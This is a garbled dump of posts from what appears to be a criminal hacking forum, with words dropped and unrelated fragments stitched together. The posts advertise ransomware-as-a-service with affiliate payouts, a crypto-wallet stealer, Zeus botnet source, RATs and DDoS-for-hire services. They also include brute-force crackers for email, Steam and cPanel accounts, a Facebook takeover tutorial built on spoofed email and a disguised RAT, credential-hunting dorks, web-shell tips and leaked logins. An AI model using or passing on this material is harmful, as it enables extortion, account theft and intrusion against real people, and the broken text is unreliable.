thanks you bro appreciate. 
guys skill forging document images web pages useful for phishing any other thing that has digital version. 
payment after the job's done you'll get light job for free see the quality. 
thanks for the share buddy. 
thanks dude for your kind post. 
orxteam wrote after year being very successful with our private locker software are now releasing the public. 
have worked hard provide better option any the other free locker services implementing proper crypto and not including any the major decryption flaws that some the other services have. 
will get you setup with everything you need make fast and easy money just few minutes. 
get other users register using your username referrer and you will automatically earn every lock they get paid. 
here are some the features our service has offer rsa aes encryption that has been properly implemented private key stored server and only released after payment locks all fixed removable network drives very fast scan and encrypt functions small. 
exe with dependencies required control panel with instant stats and detailed info frequent updates software for evasion and new methods customer support for our users and their paying customers referral system allows you make extra cash off other peoples locks even you have none you set the lock fee whatever amount you like and only keep for the services with discounted rates available users with stable supply paid unlocks instant cashout bitcoin give our service try are sure you won't disappointed. 
orx locker available over tor thanks bro. 
thank you for sharing. 
more for next release. 
priv tools symlink config scripts pull config skipped protections server explain youtube. 
com watch pvm feature youtu. 
you must reply see attachments you must reply see attachments you must reply see attachments. 
wanted know anyone could get the email and password for the psn account jobcian for. 
need buy some webshell. 
skype brianhill you have. 
keep the good work flowing. 
for share appriciate you sharing this useful tool. 
hacking asp aspx sites using backtrack path code pentest web asp auditor now run the tool using the following comman code. 
com size good luck. 
hello folks today represent you sentry mba. 
sentry great tool for cracking tons accounts like netflix and lot. 
more the only downside you need wordlist wich will add this thread another one. 
mhofon this the download link please scan before use normally should safe but ble check never hurts hope you like. 
thank you much looks good. 
will check out and post replay any one had verified you have contact atention always post your contact. 
icq link broken link does not loading please upload. 
hope that works never search hash again dude. 
size color red updated app alil added proxy support keep hidden not going lie very laggy lol but hey what expect have fun guys and happy hacking party virustotal. 
org scanners did not find malware size click here for download size size click here for download size color size. 
new release txtprofile will available shortly. 
hello any one help with any script how can find direct url link these type ftp pls any help have loots ftp like these but cant find url example need domain. 
php pls any help. 
code ftp flexo flexo. 
ftp duden dkflbvbhjdbx gorodok. 
net ftp kiselev ftp. 
ftp plushin zpmwa ftp. 
luckmangamer wrote platinum hide. 
full version software free download with serial key crack. 
about use platinum hide keep your real address hidden surf anonymously secure all the protocols your provide full encryption your activity while working internet and much more. 
key features anonymize your web surfing your real hidden when you surf the internet keeping your online activity from being tracked others. 
protect your identity anonymous web surfing enables you prevent identity thieves from stealing your identity other personal information and keep your computer safe from hacker attacks other risks. 
choose country and check proxy lists many countries are enabled and you decide select one country from the choose country window. 
you can check the current address directly. 
send anonymous emails send anonymous emails through any web based mail system such gmail hotmail etc. 
get unbanned from forums and blocked websites change your address and then you can get unbanned yourself from any forums other blocked websites that have ever banned you from. 
chat yahoo discretehacker yahoo dot com. 
idm way resume files links that fail after day validity some jumbofile links duckload links and all other type uploading site links. 
always had problem for downloading large game parts but after discovering this method has really proved much beneficial. 
got only few copy paste and few clicks. 
first all lets assume wanna resume duckload site link that failed. 
the referer link the file changes the download address changes after the validity time. 
referer link changes from. 
com error waeajllp step open regedit. 
exe from start run type regedit there computer hkey current user software download manager. 
will see some folder with name number. 
the number actually the file number downloading from idm. 
then find the file folder want resume. 
will get all information regarding the download the file like dateadded file size localpath path url all hex codes. 
got change only two string values for the download resume. 
referer optional step idm resume the file then will say that download has expired and download with browser manually and idm will capture link press let the download start. 
just after while stop the download. 
now restart the regedit. 
see the download manager key one more key created with maximum value. 
will see there the info regarding the new fresh file. 
now just copy path url and referer from old file key right click the path string. 
modify and paste the new file key folder. 
and resume the new file your broken download will start. 
gif img this program will crack almost any email all you need password list and the email providers smtp and port seen the gif above. 
features fast cracking smtp captcha easy use how use first you need the email provider smtp most common ones listed above start the cracker the type the smpt and port smtp. 
com then enter the email crack and now you need password list enter location the list then let the cracker its work few smtp see full list here. 
com products amlc list. 
com ssl port starttls port smtp. 
com ssl port smtp. 
com ssl port pop. 
com starttls port smtp. 
net port code smtp. 
net port pass list code. 
com files pass list. 
com file bbd defa cff analysis download link code. 
lurdvegaill check out wrote try out asap wrote platinum hide. 
now see its work not. 
thread modes facebook cracker rafaelcarioca offline junior member posts threads joined nov reputation warning level money donate using facebook accounts. 
txt put here email passwords. 
txt password and start cracker download hidden content you must reply see links soyawannabeaho offline junior member posts threads joined jun reputation location scotland warning level country united kingdom money. 
donate thanks very handy straight for word that dou think this the easyist way jenna offline junior member posts threads joined apr reputation warning level money. 
donate thank you for sharing kingsman offline junior member posts threads joined jun reputation location cagayan warning level country philippines money. 
donate will try and test for myself anky offline junior member posts threads joined jun reputation location india warning level country india money. 
donate will try and tell you works hoadqtk offline junior member posts threads joined jun reputation location warning level country vietnam money. 
donate will try but dont believe works hackboy offline junior member posts threads joined jun reputation location rewa warning level country india money. 
donate thanks bro very much mercymorrgan offline junior member posts threads joined jun reputation location lagos warning level country nigeria money. 
donate working who has tested nds offline junior member posts threads joined jun reputation location hunter warning level country philippines money. 
donate want try this later. 
thank you for sharing will try this. 
honeypot was recently exploited two hackers one hacker from usa was able gain access network and install process called tqadofqusn'. 
has anyone seen that before something common. 
what doing seems like its using lot bandwidth pcaps that are being generating are getting extremely large. 
one hacker from was able gain access and seems like created user account called 'butter'. 
has anyone encountered this before. 
morpheous wrote working for the first time with facebook api. 
from there documentation found can fetch name below console. 
name but how can can also fetch email and fbid. 
init appid 'f' app channelurl localhost practices phptest fblogin login. 
html' channel file status true check login status cookie true enable cookies allow the server access the session xfbml true parse xfbml. 
getloginstatus function response response. 
status 'connected' connected else response. 
status 'not authorized' not authorized login else not logged login additional init code here function login. 
login function response response. 
authresponse connected testapi else cancelled function testapi console. 
log 'welcome fetching your information. 
api me' function response console. 
log 'good see you response. 
load the sdk asynchronously function var 'facebook jssdk' ref. 
insertbefore ref document any other query refer url. 
thanks for sharing where the file chutiya banaya. 
will like see what loks like why you want download. 
learn thank you very much. 
thanks bro for sharing. 
seems really very nice tutorial really very good explianed. 
thank you very much i'll try soon and share experience with you guys. 
need assistance with ddos services regarding certain website don't think ddos protected. 
can please tell you can assist this matter and prices and how fast can. 
also possible make appear that the website will marked spammer hope hear from you soon. 
guys basically i'm new here and seriously need help i've been put quiet sticky situation couple months back went forum like this one and created thread for job needed doing against someone who had physically and verbally harassed got into contact with someone who responded seemed legit and quiet sympathetic towards situation and emphasised the fact that was ethical and that's why was willing help out. 
one day whilst were talking asked could add funds paypal that would then transfer bank account and convert into bitcoins and because thought was legit agrees sent many small transactions all from different accounts which did get suspecious but didn't say anything until the next day and few days later when the funds started get held with people stating that the transactions we're unauthorised. 
basically long story short now paypal negative balance and don't know what i'm student and don't have the money pay this off. 
the guy who got this situation keeps lying and now says has cancer and can't deal with this i'm situation where really don't know what keep getting calls from paypal and i'm scared pick someone could help advise would thankful you need message then here's icq please help and please don't dodgy i've had too much that thankyou. 
thanks mean are you seriously. 
like let try this. 
hakgod wrote dumps carding tutorial beginning before you out there and start instoring you will need the following items. 
hakgod end notes thank you for taking your time read this tutorial. 
hope was worth your time also hope that everyone who inspired this reply with any words questions they would like say. 
good luck all you will give personal lesson's carding and hacking newbies for donation paypal bitcoin. 
before donate will give personal skype number. 
vyrus all mail password cracker. 
wrote gmail hotmail yahoo yandex successfully finds passwords for mail and many more. 
rar password vipunderground download. 
good things decisive away good for work. 
botnet set solar updated zeus carperp carbot formgrabber. 
rat keylogger trojan spys email and password grabber for alibaba. 
all botnet will fully fud and using exploit kit can for deals parahack yahoo. 
would like check them out. 
download link not working. 
dumps carding tutorial beginning before you out there and start instoring you will need the following items. 
hakgod hidden content you must reply see this content end notes thank you for taking your time read this tutorial. 
before donate will give personal skype number inviato dal mio asus tapatalk. 
let know its working thx anyway. 
browser chrome fail firefox fail sandbox internet explorer link exploit windows professional. 
browser chrome fail firefox fail sandbox internet explorer link exploit download. 
nice one fella nice work and instinct. 
willing help you skype ruben. 
wallin have good day. 
when first started using rats had idea how portforward. 
the community sent the direction darkcomet had the great advantage built upnp. 
universal plug and play forwards your port automatically your router supports the worry having manually change router's settings was now gone for while anyway. 
the time eventually came for upgrade paid software for more features and more stable server. 
still had idea how portforward searched online for program that replaced darkcomets great port forwarding tool. 
here's the program found and still use this day upnp port forward utility ver. 
why because works perfectly takes about seconds forward new port and currently have need use anything else. 
the main screen above shows all your open ports and the program behind. 
after clicking add new entry you will prompted enter these details. 
give the portforward name blackshades server testing port etc. 
and then save changes and exit foolproof tips spoiler internal address will shown one your destination ip's the mainscreen. 
external and internal port should set the same number. 
all other settings can left default virus scan. 
com file ffe fbfe analysis sha ffe fbfe file name portforward setup. 
exe detection ratio analysis date utc download links code. 
com igtnr xnurgm yaqws. 
yes you search about how hack account using bruteforce and you get worldlist password list your lis good can take few days. 
need member help with zues botnet set and builder which work with latest browser happy they help. 
nice will give try. 
lets see hope this will work. 
holy mother booters this has all. 
thanks brother had register once saw this. 
great tool get username hash password win server just upload the tool and run pwdump. 
exe usage information pwdump. 
raw password extractor author andres tarasco acuna url. 
com rmjb nic eprr good luck. 
hgkhdkgjd gdlkda bczbdasvdsva yes soz cmacn samc amc. 
lsda sonal wrote need someone yesm. 
who can get good list usa mail with pass. 
would greate know about this and thanks bro for sharing. 
nice work can you inbox wanna learn how this. 
replying see hidden content. 
hello today i'm releasing new tool bitcoin litecoin terracoin ppcoin wallet stealer entirely coded. 
here's some screenshots and some informations builder isn't detected avs the stub detected stub weight. 
sends you the wallet. 
dat bitcoin litecoin terracoin ppcoin either mail ftp. 
takes less than seconds adsl connection send the files. 
here's the download link. 
com wdyfz bmj pmmlw. 
net please say thanks this program has been made for educational purposes only. 
i'm not responsible your usage. 
enjoy maj added terracoin and ppcoin wallet stealer changed the name the software added icon changer modified the stub make less detected. 
maj lowered the detection rate the stub now it's maj added the encryption ability the stub added wallet clients killer the stub. 
also the stub size lowered. 
post reply the thread cyberlocker. 
i'll try and see works. 
wondering whether could bypass behavior analysis. 
let goes into details first. 
gonna try right now and then later gonna tell you the result appreciate your work bro thanks for sharing with. 
nice programming thanx bro. 
thanks man like this. 
please can anyone help give full version spss data analysis software. 
sent from using tapatalk. 
expir wrote hello mates found this method contacting this guy this forum thought might share this. 
what does basicly you register one account and use the discribed technique for good income free money bitcoins user interaction needed. 
checkout here url thanks and just let this bot your side bots make much usd thx. 
thank you lets try. 
ldt's see andi hop work well great botnet very awesome and think will give try will work for. 
thanks mate for sharing. 
yup reupload sir need. 
was looking for that code. 
thanks for sharing but link not working. 
how know that hosting forget pass any ideo. 
thanks for the share. 
upload virus scan report with all tools. 
php diamond jewellery collection engagement rings earrings necklaces bangles with latest designs andy tuohy shop buy prints and posters. 
item welcome institute industrial arts technology education treadmills treadmills. 
category jewish calendar tools home heavy metal. 
rder datestamp material safety data sheets adler's pool centre. 
php spidermonkey canadian search. 
view account homepal your pal home video entertainment. 
age dnworld homepage foradejogo. 
net ponte barca campos divis honra viana castelo. 
nice post hope this working. 
when open this software check for new update page open and still how its work. 
this modified version the famous botnet zeus. 
you can download from here for free. 
awesome dude thanks lot. 
thank you very much great work. 
thanks god job thanks. 
thx there was error posting your reply the message too short. 
please enter message longer than characters. 
rafiqctg wrote today here with bumper collection. 
enjoy first skip the add than enjoy those pass username. 
thanks for the great share. 
omg why are you guys giving thank dint see any answer sent from ipad using tapatalk. 
nice sharing man really cool stuff. 
painkiller wrote here quick tutorial showing how hack steam accounts with program called quickbreak bruteforcer. 
run quickbreak agree with the disclaimer now you should see this. 
'account gen' first let browse for groups save add usernames from the groups press scan usernames from group save. 
back 'cracker' add the left side the usernames you just saved. 
the other side you can load your passwords. 
lets start cracking accounts tips you can use the saved groups usernames over and over again run the program more then the same time open for example download the extra file with groups use this when you are sleeping credits for making for uploading here please thank helped you with this. 
virusscans out scanners reported malware second attachment code result. 
url out scanners reported malware. 
let works inbox gmail and hotmail. 
bro interested the mailer. 
hope these still work. 
thanks for sharing bro. 
thanks for sharing tool. 
tutorial hack anyone facebook email. 
this tutorial like spreading tutorial way basically. 
but more precise and powerful. 
mostly have hacked girls with this method because they don't get fooled easily poser and other shit. 
this thing can requirements fully fud server server being fud the most important part the hack patience that's all. 
now coming the hack. 
there are basically thousands tutorials about keylogger rat stealer and crypting. 
read one and make your server fully fud. 
now just what say. 
php and leave that tab open now login your facebook and copy the username the person username you want hack like this. 
hidden content you must reply see links hidden content you must reply see links basically the name after the hidden content you must reply see links the username. 
example random the username. 
the link shows url like. 
php then you cannot use this method them. 
you are the friend the person you must know who his her best friend just close friend. 
basically get his email attached his facebook like url. 
png url hidden content you must reply see links this can hard you don't have this person your friend anyways you can ask his her email you know him. 
now just open that spoofer tab and paste the info follows spoofed email the you stolen from the contact info something anymail. 
com targets email username facebook. 
com reply email same spoofed email message title whatever message body check out new pics uploaded here link your key logger rat whatever she will receive that message from the spoofed person and she her close friend she will definitely download and run slave will take some time read the message download the file run. 
that's why said patience requirement. 
pro tip you are using the message from the example then suggest you download some the spoofed person slave friend pictures and use icon changer change your server icon jpeg icon and put all that pics and your server. 
rar file and upload the hosting site. 
lol one sees the extension you this thing. 
use rat's crew extension spoofer change the extension jpeg and change server icon jpeg too. 
hack core wrote mail address dork filetype doc gmail. 
com filetype doc yahoo. 
com filetype xls gmail. 
com filetype xls yahoo. 
com filetype csv gmail. 
com filetype csv yahoo. 
com username and password dork filetype doc username filetype doc password filetype xls username filetype xls password filetype csv username thx filetype csv password example url mail list info. 
edu eamon buckley student. 
edu thomas sloan uml. 
edu use mail grabber tool url enjoy. 
before donate will give personal skype number thx for sharing pro. 
before donate will give personal skype number nice. 
hacker wrote nice tut thnx thnx. 
thanks for sharing mate. 
error wrote can hope tks doves problem posy tut for fud codefire wrote tutorial hack anyone facebook email. 
basically the name after the the username. 
basically get his email attached his facebook like this can hard you don't have this person your friend anyways you can ask his her email you know him. 
anku radhey wrote how use them just executed the cpanel attacker. 
exe goes background processes. 
enter victim then username cpanels and paste password list and then start. 
vous mets disposition stealer php keylogger. 
fonctionne windows all firefox all versions chrome all versions internet explorer all versions microsoft edge all versions download. 
nice tut thnx thnx. 
thanks for this mate. 
hard job asking for. 
nice bro nice work keep working the best. 
tutmoses wrote have copy zeus want but you are going need crypter its not hard set you need have host hack one upload the gate the other files make sure. 
htaccess correct patch the host hacked and than distribute lol this the full source the newest zeus never used careful may infected but compile than distribute lol uploaded rghost wont infect need for garbage ads. 
rar url thanks for the files. 
bourdj wrote you have look the link. 
url want answers pls. 
looks super nice thank you. 
hey guys here situation singer from georgia tbilisi have vote for song one site fortuna. 
see that ather singers makeing something like get first place and dont know how situation can vote time day change can vote many time bought hotspot sheild but its not working normally becouse its have not much adresses change. 
please help something they get vote for second dont know how. 
you can sniff anyones username and password you're the same network. 
using 'ettercap' kali linux. 
have copy zeus want but you are going need crypter its not hard set you need have host hack one upload the gate the other files make sure. 
htaccess correct patch the host hacked and than distribute lol this the full source the newest zeus never used careful may infected but compile than distribute lol uploaded rghost wont infect need for garbage ads hidden content you must reply see links. 
hello guys today going share with you botnet that leaked. 
this works whenever the original owner the account using his botnet. 
saying that you need him online you can use his admin rights send commends. 
not online will not work screenshot botnet for ddos only download. 
ziekxedaskrg thanks don't forged like. 
gonna take try and maybe prank friend with. 
luckmangamer wrote about computer and network security complex subject and ever moving target. 
you must stay top ensure that your information protected from the bad guys. 
that where the tools and techniques outlined this book can help. 
you can implement all the security technologies and other best practices possible and your information systems might secure far you know. 
however until you understand how malicious attackers think apply that knowledge and use the right tools assess your systems from their point view you can get true sense how secure your information really. 
ethical hacking which encompasses formal and methodical penetration testing white hat hacking and vulnerability testing necessary find security flaws and help validate that your information systems are truly secure ongoing basis. 
this book provides you with the knowledge implement ethical hacking program successfully along with that you can put place keep external hackers and malicious users out your business hacking bluetooth enabled mobile phones and beyond full disclosure author adam laurie marcel holtmann martin herfurt bluetooth introduction history technology overview the bluesnarf attack the helomoto attack the bluebug attack long distance attacking the hacker underground handbook learn what takes crack even the most secure systems david melnichuk. 
you are hacked karthik shyamsunder. 
engineer selvamohan neethiraj architect joel nylund director ten secrets securing your java platform enterprise edition web applications wireless hacking projects for enthusiasts lee barken with eric bermel john eder matthew fanady michael mee marc palumbo alan koebrick google hacks. 
video tutorial lee brain ethical hacking network defence sam bowne instructor city college san francisco hacking videos part siffing remote router traffic via gre tunnels res how decrypt ssl encrypted traffic using man the middle attack auditor buffer overflows. 
idespinner bit wep cracking with injection buffer overflows. 
idespinner basic nmap usage adding modules slax backtrack live from windows part cracking bit wep key auditor breaking wep minutes crackign bit key entering the cridentials exploiting some bugs tools used windows cracking wpa networks auditor complete hacking video using metasploit meterpreter dos attack against windows ftp server how crack the local windows passwords the sam database droops box simple pen test using nmap nikto bugtraq nslookup and other tools aireplay attack wireless client required exploiting weaknesses pptp vpn auditor finding rougue smb file shares your network cracking windows passwords with backtrack and the online rainbow tables plain text how sniff around switches using arpspoof and ngrep quick and dirty intro nessus using the auditor boot cracking syskey and the sam windows using samdump and john fun with ettercap filters part anonym. 
livecd build tor onion routing and privoxy backtrack livecd installation instruction video basic tools for wardriving bluesnarfer attack tool demo buffer overflows feauture addition feauture addition dns poison routing install vnc remotely internet explorer remote command execution exploit client side attack res internet explorer remote command execution exploit client side attack res john the ripper. 
password cracker installation instruction video local password cracking presentation mac bridging with windows and sniffing mass authentication using void auditor metasploit flash tutorial mitm hijacking nmap video tut port scan boogaloo sniffing logins and passwords part sniffing remote router traffic via gre tunnels res penetration attack reconstructed telnet bruteforce tunneling exploits through ssh bluesnarfing nokia hand set snort instruction video how install into backtrack wpa crackign using aireplay. 
wep cracking using aireplay. 
start session and get the interactive commandline access remote windows box wmf file code execution vulnerability metasploit ssh dynamic port forwading sniffing voip using cain use brutus crack box running telnet cain arp poison and sniff passwords using network activ sniff webpages network content session understand the purpose the course and the phases hacking acquire the hardware and software for your laboratory build the windows hacker tool analysis laboratory build the linux hacker tool analysis laboratory test your laboratory and keep secure session understand low tech and computer based reconnaissance use sam spade gather information about target search the web for interesting target information session understand scanning techniques search for modems using thc scan develop network map using cheops conduct port scan using nmap scan for using nessus content session analyze buffer overflows crack passwords windows and linux sniff data from the network using sniffit use netcat the swiss army knife hacker tools session analyze application level trojan horse backdoor vnc analyze traditional rootkit lrk analyze kernel level rootkit kernel intrusion system session understand file hiding windows understand file hiding unix analyze protocol tunneling using reverse shell analyze covert channels using covert tcp click here get download links nice. 
pedropsb wrote not always have our books tutorials pentest basic theory even the area information security. 
nowadays the mobile phone tablet spends more time with than books notebook many cases. 
with this app you take some important information wherever you and will not forget the tutorial problems that important command. 
the app also has tcp port scanner whois query ping http header reverse dns sql injection testing wifi saved passwords the phone various portals with news feeds security among other functions. 
application portuguese but the english translation has already started manual hacker free url manual hacker gold url. 
enjoy first skip the add than enjoy those pass username you are one great person dear. 
bourdj wrote you have look the link url want answers pls. 
com username and password dork filetype doc username filetype doc password filetype xls username filetype xls password filetype csv username filetype csv password example url mail list info. 
net features automatically creates accounts websites including yahoo hotmail gmail and many more except captcha bot maker create your own bots and automate webpages smart autofill submit even unsupported sites manual submitter submit custom email sites with the autofill menu right click generates full profile with one click built disposable email services one click real names and usernames editable proxy support advanced profile system advanced settings customizable theme handy rightclick autofill menu over built names faq what does this program this program creates accounts multiple websites and saves the details for you does this program solve captcha and phone verification this program was coded visual basic with basic coding skills don't have the understanding. 
does this program support proxies yes have tested public proxies with this program and aslong they are fast they work fine when will this program multithreaded and solve captchas don't know probably never this program coded and only. 
have basic knowledge visual basic coding don't sell this application will remain pretty basic deal with how can help this application improve please provide detailed feedback any problems feature requests you have you would like accept donations witch will allow spend more time coding. 
you add websites upon request sure check out the website and able automate the form will add simple. 
this program does not work have not been coding this program for very long have only tested myself version websites does not work and your from another country sorry. 
the bot creator does not work the bot creator does not work all websites only able identify elements name and will not work flash websites. 
why this free will you ever sell this program free because free stuff awesome doubt will ever sell this application like share with everyone but can't say never. 
perfecto let's check password changed not. 
thank you mate very much. 
can get copy the kit too please. 
painkiller wrote img thanks. 
thanks definetily gonna check this out. 
thank you very much for this. 
onion after year being very successful with our private locker software are now releasing the public. 
get other users register using you referrer and you will automatically earn every lock they get paid easy way earn easy free money. 
exes with dependencies required everything except tor library built original file overwrite make recovery without paying very difficult new method coming soon control panel with instant stats and detailed info frequent updates software for evasion and new methods customer support for our users and their paying customers referral system allows you make extra cash off other peoples locks even you have none give our service try are sure you won't disappointed. 
going try this right now hope owrks. 
love this post bro thanks. 
hello hoca offer you the services service ddos attack work team storm team have been this market and have good reputation work with protected from ddos attacks hostings. 
hostings such ddos guard esteq ovh voxility cloud fire can help you get rid competitors using ddos service work with will fewer competitors our prices day days month quality guarantee many reviews and passed inspections accept all currencies are working for you you can contact icq skype storm team. 
excellent man thanks much. 
new this site and liking already. 
sruthythank you wrote tutorial hack anyone facebook email. 
hello everyone want strong stresser that could knock down almost anything you then try chargen. 
really strong boots can kill ovh's gbps and gbps each hit. 
live chats always online. 
acces alot tools and features. 
servers much time you guys want free test pack then ask live chat. 
generate shellcode using msfpayload. 
hack windows using set toolkit with browser autopwn ebook. 
wep hacking without dictionary. 
yahoo session hijacking cookie stealing. 
packet capturing session hijacking man the middle attack ebook. 
goodhacked wrote snprzq wrote hello mates found this method contacting this guy this forum thought might share this. 
good tools keep the good work. 
thanks brother for sharing dis love. 
nice work bro thanks for share. 
use some ftp client like filezilla. 
was very informative great. 
replying see the post. 
user kafir pass kafir. 
user secretaria pass secretaria sell rdp all country usa canada yahoo yahoo. 
rhanks for sharing bro try now and tell you the results. 
replying see the links. 
lemme show maybe can. 
hope it's clean nio offense please. 
let take look bro thanls. 
zuviobaba wrote bro interested the mailer thankk. 
thank you will check thids. 
png basically the name after the. 
png url this can hard you don't have this person your friend anyways you can ask his her email you know him. 
rainbowconnect wrote mailer inbox free script clean. 
center screenshots btc jabber otr alphalocker exploit. 
jabber otr payment only via btc guarantor without any problems and your expense communication only through jabber otr alphalocker exploit. 
check writing jabber otr also possible order functional writing update fixed minor bugs and added autopay writing jabber tuned update fixed errors when encrypted files with attributes supports extensions unique purse for each payment removed detectives test video work password alpha download test video. 
com writing jabber tune since april the price will rise center. 
thanks for the share boss. 
plz help drop this tutorial. 
any chance you could upload this file the current link dead. 
rafiqctg rtggabs wrote friends enjoy dont change password url. 
going test the one. 
nice bro great job. 
create yahoo email account. 
even you have old one create new one that the imported contacts are clean. 
you get confirmation screen that looks like this below. 
click import contacts get started link and then choose facebook. 
note not use chrome for this doesn appear work that browser. 
authorize yahoo the facebook pop and then wait few seconds. 
you see confirmation screen like this. 
you now imported the names and email addresses all your facebook friends into yahoo. 
now just click tools yahoo mail and export. 
csv format good format for uploading gmail your desktop contact book. 
save the file your desktop and you done. 
enjoy your new contacts. 
you just done something that facebook says you have right using tools provided facebook. 
try using web proxy cached page. 
never use virus total. 
where the link bro. 
luckmangamer wrote free download internet download manager. 
build with patch for unlimited registration without paying anything. 
about internet download manager idm tool increase download speeds times resume and schedule downloads. 
comprehensive error recovery and resume capability will restart broken interrupted downloads due lost connections network problems computer shutdowns unexpected power outages. 
simple graphic user interface makes idm user friendly and easy use. 
internet download manager has smart download logic accelerator that features intelligent dynamic file segmentation and safe multipart downloading technology accelerate your downloads. 
unlike other download managers and accelerators internet download manager segments downloaded files dynamically during download process and reuses available connections without additional connect and login stages achieve best acceleration performance. 
internet download manager supports proxy servers ftp and http protocols firewalls redirects cookies authorization audio and mpeg video content processing. 
idm integrates seamlessly into microsoft internet explorer netscape msn explorer aol opera mozilla mozilla firefox mozilla firebird avant browser myie and all other popular browsers automatically handle your downloads. 
you can also drag and drop files use internet download manager from command line. 
internet download manager can dial your modem the set time download the files you want then hang even shut down your computer when it's done. 
other features include multilingual support zip preview download categories scheduler pro sounds different events support queue processor html help and tutorial enhanced virus protection download completion progressive downloading with quotas useful for connections that use some kind fair access policy fap like direcway direct hughes etc. 
built download accelerator and many others. 
adds windows compatibility adds idm download panel for web players that can used download flash videos from sites like youtube myspacetv and google videos. 
also features complete windows and vista support youtube grabber redeveloped scheduler and mms protocol support. 
the new version also adds improved integration for and based browsers redesigned and enhanced download engine the unique advanced integration into all latest browsers improved toolbar and wealth other improvements and new features. 
build changed google chrome extension resolved problems with downloading videos from several sites fixed bug with high cpu loading click here get download links awesome post buddy. 
comment till see the content. 
good share can can load that donation for some info which needed please. 
thanks dude very useful. 
soyawannabeaho wrote thanks very handy straight for word that dou think this the easyist way. 
lets see works for. 
see this still works. 
luckmangamer wrote quick heal total security. 
about quick heal total security comprehensive security solution that promises offer everything you need stay the safe side. 
thus includes antivirus antispyware tool firewall antiphishing utilities and ample selection tools defend your precious data. 
antivirus the powerful virus detection engine quick heal total security scans and removes viruses worms trojans and many other threats that may try sneak into your system through removable drives email attachments and internet downloads. 
antispyware spyware malicious software that installed the system without the user knowledge gather personal information the user and monitor the critical information such user name passwords bank account details credit card details etc. 
the antispyware feature blocks spywares before they get installed your. 
also protects your privacy detecting and cleaning spywares and blocking their activities identity theft automatically. 
antimalware new advanced malware scanning engine scans registry files and folders lightning speed thoroughly detect and clean spywares adwares roguewares dialers riskwares and lots other potential threats your system. 
anti rootkit detects and cleans rootkits proactively doing deep system scan. 
scans running processes registry and file system for any suspicious rootkit activity that kept hidden the system. 
usb drive protection malwares that spread exploiting the autorun feature removable devices are the rise and usb drives memory stick flash drive portable hard drive have now become carriers autorun malwares. 
usb drive protection safeguards your system against such malwares disabling the autorun feature. 
browsing protection the browsing protection feature protects your computer from threats occurring through malicious websites. 
self protection self protection feature protects quick heal files folders configurations and registry entries against malicious activities and also from getting tampered. 
entertainment mode suppresses prompts across all quick heal modules and reduces system load which makes activities like playing games watching movies presentations uninterrupted without compromising the security the computer. 
anti phishing automatically scans all accessed web pages for fraudulent activity protecting you against any phishing attack you surf the internet. 
prevents identity theft blocking phishing websites. 
you can shop online use internet banking and surf the websites safely. 
antispam blocks spam mails phishing attack mails junk mails and porn mails before they reach your inbox. 
firewall protection firewall protection feature works silently the background and monitors network activity for malicious behavior ensure their elimination before the malwares can reach the system. 
the method detecting malicious network activity done intrusion detection system and the method preventing malicious network activity done intrusion prevention system. 
parental control parental control new feature quick heal that lets parents control the internet activity for their children. 
provides features that can restrict categories websites user specified websites. 
also allows parents schedule internet access for their children. 
mobile scan virus attack not just limited pcs notebooks. 
the fast paced mobile world where people access the internet using their mobile phones virus attack mobile phones now another outlet for cyber criminals spread malicious programs. 
quick heal total security provides the mobile scan feature where you can scan detect and delete malwares viruses and spywares from your mobile phones. 
mobile scan supports following mobile phones apple iphone asus blackberry ten volve fujitsu siemens mivvy motorola nokia panasonic samsung segam sharp siemens sony ericsson ztc htc mate and all the windows mobile phones. 
data theft protection data theft protection prevents unauthorized copy confidential sensitive data from your. 
blocks access pen drive writer other usb storage devices from your. 
using this feature neither the system data can copied the removable drives nor the data from outside removable drives copied your system. 
secure delete the secure delete feature permanently erases files from the hard drive opposed the normal delete procedure making unrecoverable. 
disk cleanup you have created new folder but forgot add files the folder. 
you created shortcut location and after few days deleted the location but not the shortcut. 
you been surfing the net for quite some time now and the temporary internet files have accumulated the respective folder. 
all these are invalid files junk files that clutter your system hard drive and affects system performance. 
with the disk cleanup feature you can remove such clutter free disk space that can used for other applications for improving system performance. 
registry cleanup cleans invalid and junk entries from system registry and boosts system performance. 
duplicate file finder deletes duplicate files pre defined file categories searching for duplicate files your computer. 
conserves disk space removing redundant files. 
defragmenter defragments page files and registry hives that are used applications improve the performance the system. 
download links for quick heal total security. 
i'm still looking for cracker has been reported someone showed has easy but now where want all the content longer answers. 
since need the source code urgently still able decrypt the lookout for someone small files. 
for someone that can that not problem and done minute. 
offer the person few dollars compensation expense requires online account our servers with memory domain according desire and lots specials unfortunately i've never been busy with the crack. 
thanks dude nice tuto. 
better use dnscrypt slowdown the internet all. 
bond benz wrote download rep don't forget. 
thanks for this wonderful piece. 
luckmangamer wrote hello hackers and newbies don't forget hide your before doing anything. 
sharing here very useful software for the purpose. 
but before going download page read about this. 
and yes its premium version limits b'coz has got lifetime crack. 
hide all the worlds best hide software hide all your applications and games from snoopers hackers allows you surf anonymously prevent identity theft and guard against hacker intrusions all just need click. 
your address can link your internet activities directly you can easy leak you this address hide all protects your online identity change your address our private server and routes all your internet traffic through our encrypted internet servers that all remote servers only get fake address you are very safely. 
hope can run linux with win luckmangamer wrote hello hackers and newbies don't forget hide your before doing anything. 
painkiller wrote this brute forcing program for the and coming indy game minecraft minecraft. 
work login using your endgamer forum account click the cracker tab and load username and password list. 
click start and wait for the program finish. 
should there any cracked accounts text file will created the cracker's root folder with the cracked information. 
this text file never overwritten all new entries will added the file until the file moved deleted. 
get users click the username leecher tab. 
got kind lazy when coding this far only supports sucking usernames from single forum threads time but should this cracker become more popular i'll add automatic leecher. 
use the leecher find address thread the official minecraft forums url and put the text box. 
click the grab button and you'll have the list. 
the list updates itself and deletes doubles you can put many threads you like into single list. 
click export save the file this file can then used username list for the cracker. 
download url url url url painkiller wrote this brute forcing program for the and coming indy game minecraft minecraft. 
download url url url url. 
thank's bro keep sharing with like these tools. 
will try first and wil say good bad. 
thanks will check out. 
need ddos attack website hack one simple website. 
website dont have much security. 
let know anyone can help willing pay. 
thank you ver much. 
there methode bruteforce attack you try thousand passwords and one them should match but this take too long. 
few more website against narendra modi hacked shorty. 
com news india fek. 
thegiant wrote rainbowconnect wrote mailer inbox free script clean. 
yahoo gmail url how see this mailer inbox free script clean. 
thanks for the tutorial. 
how did you get this. 
detail explained tutorial best even its from google. 
this working lets see. 
please how can get this. 
mrneven wrote you can sniff anyones username and password you're the same network. 
bro i'm using windows. 
tell how hack using chrome mrneven wrote you can sniff anyones username and password you're the same network. 
tell how using chrome. 
attach config attach attach config attach this wso. 
shell with error trick downlaod from here. 
php shell pass change password open file notepad find this auth pass replace this with your hash encoded version pass your antivirus from detecting. 
posting unlock the contents. 
